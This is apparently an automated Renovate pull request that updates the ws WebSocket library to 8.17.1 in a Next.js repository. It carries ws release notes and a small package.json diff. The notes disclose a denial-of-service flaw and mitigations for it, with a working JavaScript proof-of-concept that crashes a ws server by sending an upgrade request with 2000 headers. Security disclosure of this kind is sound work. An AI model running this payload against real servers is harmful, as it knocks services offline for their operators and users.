Update dependency ws to v8.17.1 (#2122)
[![Mend Renovate](https://app.renovatebot.com/images/banner.svg)](https://renovatebot.com)

This PR contains the following updates:

| Package | Change | Age | Adoption | Passing | Confidence |
|---|---|---|---|---|---|
| [ws](https://togithub.com/websockets/ws) | [`8.17.0` -> `8.17.1`](https://renovatebot.com/diffs/npm/ws/8.16.0/8.17.1) | [![age](https://developer.mend.io/api/mc/badges/age/npm/ws/8.17.1?slim=true)](https://docs.renovatebot.com/merge-confidence/) | [![adoption](https://developer.mend.io/api/mc/badges/adoption/npm/ws/8.17.1?slim=true)](https://docs.renovatebot.com/merge-confidence/) | [![passing](https://developer.mend.io/api/mc/badges/compatibility/npm/ws/8.16.0/8.17.1?slim=true)](https://docs.renovatebot.com/merge-confidence/) | [![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/ws/8.16.0/8.17.1?slim=true)](https://docs.renovatebot.com/merge-confidence/) |

---

### Release Notes

<details>
<summary>websockets/ws (ws)</summary>

### [`v8.17.1`](https://togithub.com/websockets/ws/releases/tag/8.17.1)

[Compare Source](https://togithub.com/websockets/ws/compare/8.17.0...8.17.1)

### Bug fixes

-   Fixed a DoS vulnerability ([#2231](https://togithub.com/websockets/ws/issues/2231)).

A request with a number of headers exceeding the [`server.maxHeadersCount`][server.maxHeadersCount]
threshold could be used to crash a ws server.

```js
const http = require('http');
const WebSocket = require('ws');

const server = http.createServer();

const wss = new WebSocket.Server({ server });

server.listen(function () {
  // Build more request headers than the default `server.maxHeadersCount`
  // (2000) by pairing characters that are valid in an HTTP header name.
  const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
  const headers = {};
  let count = 0;

  for (let i = 0; i < chars.length; i++) {
    if (count === 2000) break;

    for (let j = 0; j < chars.length; j++) {
      const key = chars[i] + chars[j];
      headers[key] = 'x';

      if (++count === 2000) break;
    }
  }

  // The four headers that make ws treat this as a WebSocket upgrade request.
  headers.Connection = 'Upgrade';
  headers.Upgrade = 'websocket';
  headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
  headers['Sec-WebSocket-Version'] = '13';

  // Send the oversized upgrade request to the ws server started above.
  const request = http.request({
    headers: headers,
    host: '127.0.0.1',
    port: server.address().port
  });

  request.end();
});
```

The vulnerability was reported by [Ryan LaPointe](https://togithub.com/rrlapointe) in [https://github.com/websockets/ws/issues/2230](https://togithub.com/websockets/ws/issues/2230).

In vulnerable versions of ws, the issue can be mitigated in the following ways:

1.  Reduce the maximum allowed length of the request headers using the
    [`--max-http-header-size=size`][--max-http-header-size=size] and/or the [`maxHeaderSize`][maxHeaderSize] options so
    that no more headers than the `server.maxHeadersCount` limit can be sent.
2.  Set `server.maxHeadersCount` to `0` so that no limit is applied.

[`--max-http-header-size=size`]: https://nodejs.org/api/cli.html#--max-http-header-sizesize

[`maxHeaderSize`]: https://nodejs.org/api/http.html#httpcreateserveroptions-requestlistener

[`server.maxHeadersCount`]: https://nodejs.org/api/http.html#servermaxheaderscount

### [`v8.17.0`](https://togithub.com/websockets/ws/releases/tag/8.17.0)

[Compare Source](https://togithub.com/websockets/ws/compare/8.16.0...8.17.0)

### Features

-   The `WebSocket` constructor now accepts the `createConnection` option ([#2219](https://togithub.com/websockets/ws/issues/2219)).

### Other notable changes

-   The default value of the `allowSynchronousEvents` option has been changed to
    `true` ([#2221](https://togithub.com/websockets/ws/issues/2221)).

This is a breaking change in a patch release. The assumption is that the option
is not widely used.

</details>

---

### Configuration

📅 **Schedule**: Branch creation - At any time (no schedule defined), Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update again.

---

 - [ ] If you want to rebase/retry this PR, check this box

---

This PR has been generated by [Mend Renovate](https://www.mend.io/free-developer-tools/renovate/). View repository job log [here](https://developer.mend.io/github/X-oss-byte/Nextjs).
renovate[bot] authored Jun 17, 2024
1 parent c72819f commit 11b08e2
Showing 2 changed files with 2 additions and 2 deletions.
2 changes: 1 addition & 1 deletion package.json
Expand Up @@ -228,7 +228,7 @@
"webpack": "5.92.0",
"webpack-bundle-analyzer": "4.10.2",
"whatwg-fetch": "3.6.20",
"ws": "8.17.0"
"ws": "8.17.1"
},
"resolutions": {
"webpack": "5.92.0",
2 changes: 1 addition & 1 deletion packages/next/package.json
Expand Up @@ -313,7 +313,7 @@
"webpack": "5.92.0",
"webpack-sources1": "npm:[email protected]",
"webpack-sources3": "npm:[email protected]",
"ws": "8.17.0"
"ws": "8.17.1"
},
"engines": {
"node": ">=16.8.0"
